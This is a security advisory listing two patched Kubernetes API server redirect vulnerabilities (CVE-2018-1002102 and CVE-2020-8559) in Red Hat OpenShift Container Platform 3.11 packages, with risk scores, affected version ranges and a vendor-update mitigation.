Multiple vulnerabilitis in OpenShift Container Platform



Published: 2020-12-18
Risk Medium
Patch available YES
Number of vulnerabilities 2
CVE-ID CVE-2018-1002102
CVE-2020-8559
CWE-ID CWE-601
CWE-264
Exploitation vector Network
Public exploit Public exploit code for vulnerability #2 is available.
Vulnerable software
Subscribe
openshift-kuryr (Red Hat package)
Operating systems & Components / Operating system package or component

openshift-enterprise-cluster-capacity (Red Hat package)
Operating systems & Components / Operating system package or component

openshift-enterprise-autoheal (Red Hat package)
Operating systems & Components / Operating system package or component

openshift-ansible (Red Hat package)
Operating systems & Components / Operating system package or component

golang-github-prometheus-prometheus (Red Hat package)
Operating systems & Components / Operating system package or component

golang-github-prometheus-node_exporter (Red Hat package)
Operating systems & Components / Operating system package or component

golang-github-prometheus-alertmanager (Red Hat package)
Operating systems & Components / Operating system package or component

golang-github-openshift-oauth-proxy (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-service-idler (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-node-problem-detector (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-metrics-server (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-dockerregistry (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-descheduler (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-cluster-autoscaler (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-enterprise-service-catalog (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-web-console (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift (Red Hat package)
Operating systems & Components / Operating system package or component

Red Hat OpenShift Container Platform
Client/Desktop applications / Software for system administration

Vendor Red Hat Inc.

Security Bulletin

This security bulletin contains information about 2 vulnerabilities.

1) Open redirect

EUVDB-ID: #VU35005

Risk: Low

CVSSv3.1: 2.3 [CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2018-1002102

CWE-ID: CWE-601 - URL Redirection to Untrusted Site ('Open Redirect')

Exploit availability: No

Description

The vulnerability allows a remote privileged user to gain access to sensitive information.

Improper validation of URL redirection in the Kubernetes API server in versions prior to v1.14.0 allows an attacker-controlled Kubelet to redirect API server requests from streaming endpoints to arbitrary hosts. Impacted API servers will follow the redirect as a GET request with client-certificate credentials for authenticating to the Kubelet.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

openshift-kuryr (Red Hat package): 3.11.153-1.git.1.073ef06.el7 - 3.11.248-1.git.1.f90c804.el7

openshift-enterprise-cluster-capacity (Red Hat package): 3.11.16-1.git.380.1406f2f.el7 - 3.11.248-1.git.1.37b107c.el7

openshift-enterprise-autoheal (Red Hat package): 3.11.16-1.git.219.5443970.el7 - 3.11.248-1.git.1.0020348.el7

openshift-ansible (Red Hat package): 3.11.16-1.git.0.4ac6f81.el7 - 3.11.248-1.git.0.fd212c7.el7

golang-github-prometheus-prometheus (Red Hat package): 3.11.16-1.git.5020.5e81ed1.el7 - 3.11.248-1.git.1.ad54f5b.el7

golang-github-prometheus-node_exporter (Red Hat package): 3.11.16-1.git.1056.1583d2a.el7 - 3.11.248-1.git.1.32f87fc.el7

golang-github-prometheus-alertmanager (Red Hat package): 3.11.16-1.git.0.be735ec.el7 - 3.11.248-1.git.1.66abd18.el7

golang-github-openshift-oauth-proxy (Red Hat package): 3.11.16-1.git.409.922769e.el7 - 3.11.248-1.git.1.9885abb.el7

atomic-openshift-service-idler (Red Hat package): 3.11.16-1.git.14.a65cbf0.el7 - 3.11.248-1.git.1.4c42a90.el7

atomic-openshift-node-problem-detector (Red Hat package): 3.11.16-1.git.198.95f4dfa.el7 - 3.11.248-1.git.1.628ff22.el7

atomic-openshift-metrics-server (Red Hat package): 3.11.16-1.git.52.9fd74a8.el7 - 3.11.248-1.git.1.b53e0e3.el7

atomic-openshift-dockerregistry (Red Hat package): 3.11.51-1.git.446.d29ce0e.el7 - 3.11.248-1.git.1.bb4a1fc.el7

atomic-openshift-descheduler (Red Hat package): 3.11.16-1.git.300.abfab3c.el7 - 3.11.248-1.git.1.108ef32.el7

atomic-openshift-cluster-autoscaler (Red Hat package): 3.11.16-1.git.0.8c8305e.el7 - 3.11.248-1.git.1.b5530f6.el7

atomic-enterprise-service-catalog (Red Hat package): 3.11.16-1.git.1633.05087cb.el7 - 3.11.248-1.git.1.9aad2ef.el7

atomic-openshift-web-console (Red Hat package): 3.11.16-1.git.289.ecf7441.el7 - 3.11.219-1.git.1.9b9b889.el7

atomic-openshift (Red Hat package): 3.11.16-1.git.0.b48b8f8.el7 - 3.11.219-1.git.0.0c21387.el7

Red Hat OpenShift Container Platform: before 3.11.343

External links

http://access.redhat.com/errata/RHSA-2020:5363


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated privileged user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

2) Permissions, Privileges, and Access Controls

EUVDB-ID: #VU34130

Risk: Medium

CVSSv3.1: 5.8 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N/E:P/RL:O/RC:C]

CVE-ID: CVE-2020-8559

CWE-ID: CWE-264 - Permissions, Privileges, and Access Controls

Exploit availability: Yes

Description

The vulnerability allows a remote privileged user to execute arbitrary code.

The Kubernetes kube-apiserver in versions v1.6-v1.15, and versions prior to v1.16.13, v1.17.9 and v1.18.6 are vulnerable to an unvalidated redirect on proxied upgrade requests that could allow an attacker to escalate privileges from a node compromise to a full cluster compromise.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

openshift-kuryr (Red Hat package): 3.11.153-1.git.1.073ef06.el7 - 3.11.248-1.git.1.f90c804.el7

openshift-enterprise-cluster-capacity (Red Hat package): 3.11.16-1.git.380.1406f2f.el7 - 3.11.248-1.git.1.37b107c.el7

openshift-enterprise-autoheal (Red Hat package): 3.11.16-1.git.219.5443970.el7 - 3.11.248-1.git.1.0020348.el7

openshift-ansible (Red Hat package): 3.11.16-1.git.0.4ac6f81.el7 - 3.11.248-1.git.0.fd212c7.el7

golang-github-prometheus-prometheus (Red Hat package): 3.11.16-1.git.5020.5e81ed1.el7 - 3.11.248-1.git.1.ad54f5b.el7

golang-github-prometheus-node_exporter (Red Hat package): 3.11.16-1.git.1056.1583d2a.el7 - 3.11.248-1.git.1.32f87fc.el7

golang-github-prometheus-alertmanager (Red Hat package): 3.11.16-1.git.0.be735ec.el7 - 3.11.248-1.git.1.66abd18.el7

golang-github-openshift-oauth-proxy (Red Hat package): 3.11.16-1.git.409.922769e.el7 - 3.11.248-1.git.1.9885abb.el7

atomic-openshift-service-idler (Red Hat package): 3.11.16-1.git.14.a65cbf0.el7 - 3.11.248-1.git.1.4c42a90.el7

atomic-openshift-node-problem-detector (Red Hat package): 3.11.16-1.git.198.95f4dfa.el7 - 3.11.248-1.git.1.628ff22.el7

atomic-openshift-metrics-server (Red Hat package): 3.11.16-1.git.52.9fd74a8.el7 - 3.11.248-1.git.1.b53e0e3.el7

atomic-openshift-dockerregistry (Red Hat package): 3.11.51-1.git.446.d29ce0e.el7 - 3.11.248-1.git.1.bb4a1fc.el7

atomic-openshift-descheduler (Red Hat package): 3.11.16-1.git.300.abfab3c.el7 - 3.11.248-1.git.1.108ef32.el7

atomic-openshift-cluster-autoscaler (Red Hat package): 3.11.16-1.git.0.8c8305e.el7 - 3.11.248-1.git.1.b5530f6.el7

atomic-enterprise-service-catalog (Red Hat package): 3.11.16-1.git.1633.05087cb.el7 - 3.11.248-1.git.1.9aad2ef.el7

atomic-openshift-web-console (Red Hat package): 3.11.16-1.git.289.ecf7441.el7 - 3.11.219-1.git.1.9b9b889.el7

atomic-openshift (Red Hat package): 3.11.16-1.git.0.b48b8f8.el7 - 3.11.219-1.git.0.0c21387.el7

Red Hat OpenShift Container Platform: before 3.11.343

External links

http://access.redhat.com/errata/RHSA-2020:5363


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, proof of concept for this vulnerability is available.



###SIDEBAR###